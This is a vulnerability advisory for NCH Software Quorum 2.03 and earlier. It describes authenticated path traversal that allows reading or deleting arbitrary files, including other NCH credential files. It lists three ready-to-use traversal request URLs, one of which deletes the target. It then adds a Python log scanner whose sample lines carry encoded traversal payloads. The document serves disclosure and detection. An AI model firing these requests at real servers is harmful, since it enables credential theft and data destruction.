An authenticated user can view or delete any file on the remote system through path traversal in several separate functions. What can be reached depends on the context the application is running in. The same flaw can also be used to view the credential files of other NCH applications, which are often stored in \ProgramData\NCH Software\.
Directory Traversal & Arbitrary File Deletion
NCH Software
Quorum 2.03 and earlier
Remote
Yes
HOST/logprop?file=/../../../../../../Windows/win.ini (read)
HOST/documentprop?file=/../../../../../../Windows/win.ini&conference=<conferenceID> (read)
HOST/documentdelete?file=/../../../../../../Windows/win.ini&conference=<conferenceID> (delete)
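
For detection, the following added example (not part of the original advisory and not NCH code) scans web request lines for traversal sequences in the file parameter of the three endpoints listed above. The log line layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoints named in the advisory that take a `file` parameter, and their impact.
ENDPOINTS = {"/logprop": "read", "/documentprop": "read", "/documentdelete": "delete"}

def normalise(value, rounds=3):
    """Percent-decode repeatedly so double-encoded dots and slashes are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")  # treat Windows separators like "/"

def check_request(target):
    """Return (path, impact, file) when the request target carries a '..'
    segment in `file` on an affected endpoint, otherwise None."""
    parts = urlsplit(target)
    impact = ENDPOINTS.get(parts.path.rstrip("/").lower())
    if impact is None:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("file", []):
        name = normalise(raw)
        if ".." in name.split("/"):
            return parts.path, impact, name
    return None

SAMPLE_LOG = [  # constructed lines in an assumed format, not real Quorum logs
    '10.0.0.5 "GET /logprop?file=/../../../../../../Windows/win.ini HTTP/1.1" 200',
    '10.0.0.5 "GET /documentdelete?file=%2f%2e%2e%2f%2e%2e%2fWindows%2fwin.ini&conference=1 HTTP/1.1" 200',
    '10.0.0.7 "GET /documentprop?file=agenda.pdf&conference=1 HTTP/1.1" 200',
    '10.0.0.7 "GET /logprop?file=..%5c..%5cProgramData%5cNCH%20Software HTTP/1.1" 200',
]

def scan(lines):
    """Collect one finding per log line whose request matches check_request."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        hit = m and check_request(m.group(1))
        if hit:
            hits.append(hit)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Findings with the delete impact deserve priority in triage, since the file named in the request may already be gone from the host.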